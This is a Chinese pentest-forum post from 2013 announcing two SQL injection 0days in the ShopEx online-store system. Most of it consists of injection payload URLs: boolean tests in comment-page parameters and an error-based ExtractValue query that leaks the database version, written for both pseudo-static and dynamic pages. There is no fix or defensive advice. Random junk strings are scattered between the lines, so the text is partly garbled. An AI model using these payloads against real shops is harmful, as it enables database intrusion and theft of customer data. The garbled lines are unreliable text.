中国网络渗透测试联盟
标题:
shopex通杀注入0day漏洞两处
[打印本页]
作者:
admin
时间:
2013-2-19 08:31
标题:
shopex通杀注入0day漏洞两处
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
* [) H) H4 }" u; r
: Z5 @& f! `8 @9 O$ P
好吧,我扯远了~~
& s0 P% Y+ h/ K( r7 R, H
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
/ }, X; f% @; W
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
0 Z5 W: F- @: W1 n) l- w
; @0 t+ i" X3 F( i
http://www.x.cn/index.php?comment-822
′/**/and/**/’1′=’1-ask-commentlist.html
6 l& }3 q! i5 G: R" l
0 L5 C: S% Z$ b, v3 `1 ~/ s
http://www.x.com/comment-8967
′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
) G* Q% p( g; U8 B. ?' I
7 f' w' Z8 ~+ J, @0 A
http://www.x.cn/index.php?comment-822
′/**/and/**/’1′=’1-ask-commentlist.html
! B" A3 t3 Z: e; u* `
" s6 L7 q! H, T% W# F+ N, b
http://demo.x.com.cn/485/index.php?comment-190
′/**/and/**/’1′=’1-ask-commentlist.html
- M1 a) T( H7 U/ ^6 B3 b- ?5 {
. ]: ~6 \' c: D4 E F# B4 L1 k
/ ?1 o, s" s2 J8 x( A) K
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
# h& i5 @$ u! y8 e `0 t
如何注入就不多说了,10多年的东西了…不会也会了…
* h& `( @2 _1 O! Q
! T% t) h9 w/ p5 e) G2 ~
2 L% Q! t2 g7 c+ d+ b) G) z
2 ]( A: x- W1 ^; P
6 [2 j; Y& |. B9 @8 {' x/ e
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2